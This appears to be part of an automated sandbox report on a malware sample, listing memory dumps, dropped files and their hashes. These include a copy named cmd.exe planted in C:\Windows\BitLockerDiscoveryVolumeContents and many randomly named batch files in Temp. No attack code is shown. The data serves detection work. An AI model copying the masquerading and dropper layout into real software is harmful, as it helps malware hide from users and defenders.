SHA256 b5199d3eb28e7de8ec4a5de66cb339a03d90b297e2292473badaab98ade15c63
SHA512 f96658bd19b672fd84038bd7e95c89e14f4e6f84e3ce9c6fe3216861a41203406148c6a809c2ab350d0d6c5919c845f619deb1fc9b1f1814dfce87e566bc2394

memory/2248-373-0x0000028DB7EB0000-0x0000028DB7ED2000-memory.dmp

memory/4796-382-0x000001D81D4B0000-0x000001D81D526000-memory.dmp

memory/376-385-0x00000000015A0000-0x00000000015B2000-memory.dmp

memory/5440-808-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\5Ad8adCyX4.bat

MD5 4a7162c87abef77d3ebe0cbf2c74583f
SHA1 1cc8da99f8f6433f319af7cf75def028da2fcad0
SHA256 e928cbb1fd187bf9eec0e87d502096c017e3f6583047417ac2313e30d009bc2f
SHA512 a618822fbe4721e0b4d59e1af74d1d5e8051bc199f3749adaf94ea4a64deb1b1b1f8d6a2e51451914eceecb336cd507d41245e1aaec6c66998fe53c8719d334e

memory/5668-840-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 ad5cd538ca58cb28ede39c108acb5785
SHA1 1ae910026f3dbe90ed025e9e96ead2b5399be877
SHA256 c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033
SHA512 c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 976f9460c70c6152d51268c92047a9e4
SHA1 d6364332ef19040f010312179575875326c215c6
SHA256 55bafe6cd2eaad40f35b53760b279da4c82ea3f01516db37345cd86cc098fd5a
SHA512 b65de14b9dfb38fbd927b4ebeaa35155abdb956f90dc407e312abf396255a682af089ce84c6f40b95cdd37cb4243caadf5ead774d81258cf21f4b611ebda584c

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 976f9460c70c6152d51268c92047a9e4
SHA1 d6364332ef19040f010312179575875326c215c6
SHA256 55bafe6cd2eaad40f35b53760b279da4c82ea3f01516db37345cd86cc098fd5a
SHA512 b65de14b9dfb38fbd927b4ebeaa35155abdb956f90dc407e312abf396255a682af089ce84c6f40b95cdd37cb4243caadf5ead774d81258cf21f4b611ebda584c

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 c2943e6810526c25038dd1a31befc379
SHA1 87017f5ee9970737227f781c0c6b8bcf85008358
SHA256 ea410c57a98d3db8aba617008450a4edce3006e8e6862c9c00d603322c96294b
SHA512 9f718dc6507d522c35916629d2829e9b40e0652ee230f3ade282ecf93bdf016d33543358e9166402f47f1c47181a3e4dde014fe34742ba49cdb1e663dbfd5aa7

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 97b14663be775e32d0cc41d78134d6eb
SHA1 d241a154331d5bfa64d7ccbfa2580d122d075402
SHA256 69b0dc302c87db15b96c476b8d45eefd110d765551a131e66ffa2fffa4b16579
SHA512 0d2c7dca6affbad1cac7f04d609ea41335c974fdb56e783c560cc69b9579248d20ad41ea55504f73cc645e755441bf71837c6e1e7058a841028573fa67f66108

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 7ff35987e8cb655bbe1bd2e66a275ed7
SHA1 ec6d9c4a6e9bdf05dc90cc72822dc9b10fdc1a7d
SHA256 6563911ae23e0ffb69ed44b2fca3df0d7060568c7c891b47b83fa0d4fe8974ee
SHA512 70f2f830e56869932c387bd00c526e8fd073feb64de90e56a772fd87f269285f96c9d63991e3073ab62dd1687abfc0f1babc1b52a58896a6a92b517dd6343ea9

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 7ff35987e8cb655bbe1bd2e66a275ed7
SHA1 ec6d9c4a6e9bdf05dc90cc72822dc9b10fdc1a7d
SHA256 6563911ae23e0ffb69ed44b2fca3df0d7060568c7c891b47b83fa0d4fe8974ee
SHA512 70f2f830e56869932c387bd00c526e8fd073feb64de90e56a772fd87f269285f96c9d63991e3073ab62dd1687abfc0f1babc1b52a58896a6a92b517dd6343ea9

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 1488f354afb98ba2457d9dc864a365da
SHA1 fccb09a5edf67b6578109cd9007d3750e689ae1e
SHA256 253b7961e7a52f9713810ebaee3f751953c48989dbb84f7202ebfb5496fc99c7
SHA512 6d2b1b1c38c16507395c97d0a13f7a4020db702558a1a52e2d9f6a229e09d0d2acda3192406fc7a3646ef7a0a4fd63d8ab958376a89e3dd617b4115a4a19a06c

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 728626f943ea1c38299fcb2c2d10f15a
SHA1 7fbc7446bde20ba67b6a71319eb873007c29258e
SHA256 35ea4443dea27b8dd62727eb5e1f63814fb955325ba02dedde435fcd0700b044
SHA512 57b6caa34e7194459a981a2eba03a79ebc71edb2253ed5f9491d839c1a365dfa8b73db2cea0d669ea07c3375cd9927eb1643237505c71788b2a6db30a31ed3ef

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 728626f943ea1c38299fcb2c2d10f15a
SHA1 7fbc7446bde20ba67b6a71319eb873007c29258e
SHA256 35ea4443dea27b8dd62727eb5e1f63814fb955325ba02dedde435fcd0700b044
SHA512 57b6caa34e7194459a981a2eba03a79ebc71edb2253ed5f9491d839c1a365dfa8b73db2cea0d669ea07c3375cd9927eb1643237505c71788b2a6db30a31ed3ef

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 0671e061cef525069ed8bfb11348e499
SHA1 53aa6cea45d79410643a419e8a9dbf71f2ffee6b
SHA256 f9c1eb456165bce6650eb80f644b1f8ccd93d0fc0477cce4816ea7bee092fdd9
SHA512 d5436e48e262e09cb121e3d4322b0452f0e88052d6039956688e67097ca346d2a69245b69e597d94d6b97225814b859edfea10021839f9ddd50156eb8c7053fd

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 3dfac0307d8327e3d4167f3963144847
SHA1 beac2898d4dc2f80478a850e3bbdf8e3d3eb9a80
SHA256 abe9badb7e88a3e4694396520a2356f4c0b9f56a42bbd5b6b1064a454a7d08c3
SHA512 d2364cf53ff67598d056a76d1d5e2f6cf4bba5ac64900ec251d2cdda5387b88e263c4251debcce3f1db0e3297cb8e254938d05a9bb1944108f995b70d0bee39d

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 3dfac0307d8327e3d4167f3963144847
SHA1 beac2898d4dc2f80478a850e3bbdf8e3d3eb9a80
SHA256 abe9badb7e88a3e4694396520a2356f4c0b9f56a42bbd5b6b1064a454a7d08c3
SHA512 d2364cf53ff67598d056a76d1d5e2f6cf4bba5ac64900ec251d2cdda5387b88e263c4251debcce3f1db0e3297cb8e254938d05a9bb1944108f995b70d0bee39d

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 0671e061cef525069ed8bfb11348e499
SHA1 53aa6cea45d79410643a419e8a9dbf71f2ffee6b
SHA256 f9c1eb456165bce6650eb80f644b1f8ccd93d0fc0477cce4816ea7bee092fdd9
SHA512 d5436e48e262e09cb121e3d4322b0452f0e88052d6039956688e67097ca346d2a69245b69e597d94d6b97225814b859edfea10021839f9ddd50156eb8c7053fd

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 f4d443c7b4a9abe6ab3a6125e40614e5
SHA1 fa72c5c2196fd51ebecd1f79a4619cd3b53db094
SHA256 bc2a665f349bbda6d57a75f562ef8c3d2c518ac6802b130b94ba759b82e63659
SHA512 d938a0d27212cce0f342bda7ffd3e674a35abfd64b9647cd4437688939af603812b4685484b82d9367fb44da8673111294f0e0c8c1d85a09d181adaf5dfbf6ce

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 f4d443c7b4a9abe6ab3a6125e40614e5
SHA1 fa72c5c2196fd51ebecd1f79a4619cd3b53db094
SHA256 bc2a665f349bbda6d57a75f562ef8c3d2c518ac6802b130b94ba759b82e63659
SHA512 d938a0d27212cce0f342bda7ffd3e674a35abfd64b9647cd4437688939af603812b4685484b82d9367fb44da8673111294f0e0c8c1d85a09d181adaf5dfbf6ce

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 7cc9d0d8a92db6ee0dcf5b86e817b045
SHA1 16f420f3c9e38e4eea9dc8c81ed247b607b321be
SHA256 3322b3acb6fe98777c4d1fe63d9fc57bf8104db3ec1ebc0be656bce983eedb2f
SHA512 d4f1763fb78d7e005cf9968e5aad22d0aeb889ee94392c23309c07d0206cd23dae0b53a51872a6ac0de833c507f01a271622985aeb1f3b490e8babb52869a832

memory/6132-895-0x0000000000000000-mapping.dmp

C:\Windows\BitLockerDiscoveryVolumeContents\cmd.exe

MD5 bd31e94b4143c4ce49c17d3af46bcad0
SHA1 f8c51ff3ff909531d9469d4ba1bbabae101853ff
SHA256 b5199d3eb28e7de8ec4a5de66cb339a03d90b297e2292473badaab98ade15c63
SHA512 f96658bd19b672fd84038bd7e95c89e14f4e6f84e3ce9c6fe3216861a41203406148c6a809c2ab350d0d6c5919c845f619deb1fc9b1f1814dfce87e566bc2394

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\cmd.exe.log

MD5 d63ff49d7c92016feb39812e4db10419
SHA1 2307d5e35ca9864ffefc93acf8573ea995ba189b
SHA256 375076241775962f3edc08a8c72832a00920b427a4f3332528d91d21e909fa12
SHA512 00f8c8d0336d6575b956876183199624d6f4d2056f2c0aa633a6f17c516f22ee648062d9bc419254d84c459323e9424f0da8aed9dd4e16c2926e5ba30e797d8a

memory/6132-898-0x00000000013E0000-0x00000000013F2000-memory.dmp

memory/5148-899-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\wRWwqJyPGw.bat

MD5 b1bfd3abafebdf2307c19462ecd2f37d
SHA1 40f92e29aabce2a465d18f3e967f60102816e3cb
SHA256 6d0176370e886f7b2a61f00884dffcace089b098eb8309e9f4c0104e24611f90
SHA512 bdc5f0a0d3320ff1bbe98e66949f85fb36bd4e80ba64785924b9ebfc209df6146b1249a80f2a0881573262807bfce0e5006e0769d2e27145d8b174d5819854bc

memory/5204-901-0x0000000000000000-mapping.dmp

memory/5220-902-0x0000000000000000-mapping.dmp

C:\Windows\BitLockerDiscoveryVolumeContents\cmd.exe

MD5 bd31e94b4143c4ce49c17d3af46bcad0
SHA1 f8c51ff3ff909531d9469d4ba1bbabae101853ff
SHA256 b5199d3eb28e7de8ec4a5de66cb339a03d90b297e2292473badaab98ade15c63
SHA512 f96658bd19b672fd84038bd7e95c89e14f4e6f84e3ce9c6fe3216861a41203406148c6a809c2ab350d0d6c5919c845f619deb1fc9b1f1814dfce87e566bc2394

memory/5344-904-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\Urxb3wPgb0.bat

MD5 989fd95c6c29ee3d58d6004ce1d8bdc4
SHA1 560990b58082ca5506d6b86cb12e091d81b819a9
SHA256 1215d04cdce43b980f3da80d70689ea148b9e31fa2cddabb0b07222d3f3a47b6
SHA512 1b59a09992b3e8c8588afe273100725b60c8bbbf99d7046fea4bb958e6b3a520cf90f5415c7f98f5cdd6369e9c8b9211290e40d5921b353ffeec6164e2f50533

memory/5448-906-0x0000000000000000-mapping.dmp

memory/5460-907-0x0000000000000000-mapping.dmp

C:\Windows\BitLockerDiscoveryVolumeContents\cmd.exe

MD5 bd31e94b4143c4ce49c17d3af46bcad0
SHA1 f8c51ff3ff909531d9469d4ba1bbabae101853ff
SHA256 b5199d3eb28e7de8ec4a5de66cb339a03d90b297e2292473badaab98ade15c63
SHA512 f96658bd19b672fd84038bd7e95c89e14f4e6f84e3ce9c6fe3216861a41203406148c6a809c2ab350d0d6c5919c845f619deb1fc9b1f1814dfce87e566bc2394

memory/5460-909-0x00000000008D0000-0x00000000008E2000-memory.dmp

memory/5284-910-0x0000000000000000-mapping.dmp

memory/5596-912-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\RBOUzXbIOW.bat

MD5 4de341373f31eacae325ac46ace20fb0
SHA1 64336ad918fa2e00500d14f8074eef4bc3e1d6a9
SHA256 69036e54d61b80510a59aa84823efcb15faa94a25b9840a3336e549cd44167ef
SHA512 027a27e1f567f28df045b643aacd8f444e93423527294fcc633e1e9b75c4b298145188ea166b4379afb1c6aa27c212f1492a931c88b64adfaaae57f564554eaa

memory/5608-913-0x0000000000000000-mapping.dmp

C:\Windows\BitLockerDiscoveryVolumeContents\cmd.exe

MD5 bd31e94b4143c4ce49c17d3af46bcad0
SHA1 f8c51ff3ff909531d9469d4ba1bbabae101853ff
SHA256 b5199d3eb28e7de8ec4a5de66cb339a03d90b297e2292473badaab98ade15c63
SHA512 f96658bd19b672fd84038bd7e95c89e14f4e6f84e3ce9c6fe3216861a41203406148c6a809c2ab350d0d6c5919c845f619deb1fc9b1f1814dfce87e566bc2394

memory/5820-915-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\FEON83D8AI.bat

MD5 fdb53026d0e27f2bd0417b1ba90f0b94
SHA1 d224dd7ec31563b03e73f55893cebdb7e2592119
SHA256 ae16ead192c1094d57514b3ac38f6dcc0c5aa9b9f2661ebfd44a8f8dc37d8a2b
SHA512 76e6480820848df7d440da14610116726f2ef493ee7d9edf05284b3973dc02a6a75d9ef9ff511c949beac6b9fe829b322154f0af9babc0eeb3ccb2a474106b1d

memory/5424-917-0x0000000000000000-mapping.dmp

memory/5916-918-0x0000000000000000-mapping.dmp

C:\Windows\BitLockerDiscoveryVolumeContents\cmd.exe

MD5 bd31e94b4143c4ce49c17d3af46bcad0
SHA1 f8c51ff3ff909531d9469d4ba1bbabae101853ff
SHA256 b5199d3eb28e7de8ec4a5de66cb339a03d90b297e2292473badaab98ade15c63
SHA512 f96658bd19b672fd84038bd7e95c89e14f4e6f84e3ce9c6fe3216861a41203406148c6a809c2ab350d0d6c5919c845f619deb1fc9b1f1814dfce87e566bc2394

memory/3068-920-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\V3SaMhi525.bat

MD5 76ab68a8972cbbe844302bf8806de464
SHA1 d1913e1d71b1965c68b04cffe8818af7e3f8b07d
SHA256 43b175c63e7a89c77323de0cb7d99a4496514bbe768b79db963e3a426c01e9bd
SHA512 673b108b24e8912832385a86eece9b2fe8044ada1c41b693ad456309c79ef96b98d71be114e1977f1fe943a8e2dee31b05e897a23a6205d138081f6b6f954212

memory/4764-922-0x0000000000000000-mapping.dmp

memory/220-923-0x0000000000000000-mapping.dmp

C:\Windows\BitLockerDiscoveryVolumeContents\cmd.exe

MD5 bd31e94b4143c4ce49c17d3af46bcad0
SHA1 f8c51ff3ff909531d9469d4ba1bbabae101853ff
SHA256 b5199d3eb28e7de8ec4a5de66cb339a03d90b297e2292473badaab98ade15c63
SHA512 f96658bd19b672fd84038bd7e95c89e14f4e6f84e3ce9c6fe3216861a41203406148c6a809c2ab350d0d6c5919c845f619deb1fc9b1f1814dfce87e566bc2394

memory/220-925-0x0000000002380000-0x0000000002392000-memory.dmp

memory/3816-926-0x0000000000000000-mapping.dmp

memory/4440-928-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\yWf31kVUUl.bat

MD5 d409a80e87c162cbc3611d24b84685d4
SHA1 abac0c1c107a089131a47a63b14a6727f274becb
SHA256 ce2c9b8c85bd2c75d2f3fce97ffc519584299988bcd55dfb648732ae53913c30
SHA512 9db49e75a291b9732164c2fadfe1d5500aca95a02eafb297c1e4c6056c80fffffba892f174cc6f244a1a98f0aeedac7cce545b0ea087cff985e7386b8670c717

memory/5680-929-0x0000000000000000-mapping.dmp

C:\Windows\BitLockerDiscoveryVolumeContents\cmd.exe

MD5 bd31e94b4143c4ce49c17d3af46bcad0
SHA1 f8c51ff3ff909531d9469d4ba1bbabae101853ff
SHA256 b5199d3eb28e7de8ec4a5de66cb339a03d90b297e2292473badaab98ade15c63
SHA512 f96658bd19b672fd84038bd7e95c89e14f4e6f84e3ce9c6fe3216861a41203406148c6a809c2ab350d0d6c5919c845f619deb1fc9b1f1814dfce87e566bc2394

memory/5680-931-0x00000000011A0000-0x00000000011B2000-memory.dmp

memory/5100-932-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\0Sh6ipYOoX.bat

MD5 cc08685f9e0d1623b4c4bb9d62d93317
SHA1 3b346d89d0d1e3a679807c7150e982740e59896a
SHA256 cf2a9b82832787e9a7babd802d1d19e8eb6d9ac075a004a5d384ec4870dba41d
SHA512 77f5203c0962c5868a485aa9b53558997ac32cc64fd683a5fae464acd9b25b44608dce72d3f615f5220cb9d6aee611cd92e5e94e723d3c851adda1054a7d58e1

memory/3540-934-0x0000000000000000-mapping.dmp

memory/4556-935-0x0000000000000000-mapping.dmp

C:\Windows\BitLockerDiscoveryVolumeContents\cmd.exe

MD5 bd31e94b4143c4ce49c17d3af46bcad0
SHA1 f8c51ff3ff909531d9469d4ba1bbabae101853ff
SHA256 b5199d3eb28e7de8ec4a5de66cb339a03d90b297e2292473badaab98ade15c63
SHA512 f96658bd19b672fd84038bd7e95c89e14f4e6f84e3ce9c6fe3216861a41203406148c6a809c2ab350d0d6c5919c845f619deb1fc9b1f1814dfce87e566bc2394

memory/4556-937-0x0000000000F10000-0x0000000000F22000-memory.dmp

memory/4736-938-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\mQXsfud8LV.bat

MD5 72b6f50c384447697b7eb99e69f48cb6
SHA1 723a06f2b29e630b5498a2eeb9833e1fc09e9b01
SHA256 31ca9bf092f06a1a3e5b9322076f21cbf896977a8080864363e11d268c6e773a
SHA512 66da06c93caac94fe7319f70a1fd783f1c43bb1d978cd329c616a638ecfd8035586cc1d3f1ec2150d8ec20277dacb4b940298a68b304a84bbeec7acdc314df68

memory/4236-940-0x0000000000000000-mapping.dmp

memory/4776-941-0x0000000000000000-mapping.dmp

C:\Windows\BitLockerDiscoveryVolumeContents\cmd.exe

MD5 bd31e94b4143c4ce49c17d3af46bcad0
SHA1 f8c51ff3ff909531d9469d4ba1bbabae101853ff
SHA256 b5199d3eb28e7de8ec4a5de66cb339a03d90b297e2292473badaab98ade15c63
SHA512 f96658bd19b672fd84038bd7e95c89e14f4e6f84e3ce9c6fe3216861a41203406148c6a809c2ab350d0d6c5919c845f619deb1fc9b1f1814dfce87e566bc2394

memory/4776-943-0x0000000000AC0000-0x0000000000AD2000-memory.dmp

memory/4004-944-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\fmZn61weJC.bat

MD5 539940dcbc1dfb2a93f8dcb00a6c9abe
SHA1 8afafddc7ca0fccc1960ad2fc399c6cb0da34d07
SHA256 8248d904521bfa884e595fc0dcdf2d5fd90e3f48457e54adad700ccd82ca0577
SHA512 e6f69d2af2485489c9192c2ba843c745bb37c1fc4e95ba6a6aec2eca699aa37ca64da955ce3497769aa69a08242977db50a35edefe232ee922ebc2e6da468de0

memory/5736-946-0x0000000000000000-mapping.dmp

memory/4704-947-0x0000000000000000-mapping.dmp

C:\Windows\BitLockerDiscoveryVolumeContents\cmd.exe

MD5 bd31e94b4143c4ce49c17d3af46bcad0
SHA1 f8c51ff3ff909531d9469d4ba1bbabae101853ff
SHA256 b5199d3eb28e7de8ec4a5de66cb339a03d90b297e2292473badaab98ade15c63
SHA512 f96658bd19b672fd84038bd7e95c89e14f4e6f84e3ce9c6fe3216861a41203406148c6a809c2ab350d0d6c5919c845f619deb1fc9b1f1814dfce87e566bc2394

memory/4704-949-0x0000000002840000-0x0000000002852000-memory.dmp

memory/4888-950-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\MzhLoGhvPq.bat

MD5 e5e8ba84bd0ffb14d3c570089fa46597
SHA1 5ef13dba9c4970c948994d485a60bb9983214d96
SHA256 d815aacea47f122c14ac370249f0b87d7b4a47610cc3d0112dec5a85d7b81b3c
SHA512 310257f4fdf9303914c6c111b321062c2bcf1c1849107960243dea1e4a802b4e7ca31a2da478b81a74b9fbf1bc7eab57d542d9593e70f0ba68c00c184ed79d55

memory/2804-952-0x0000000000000000-mapping.dmp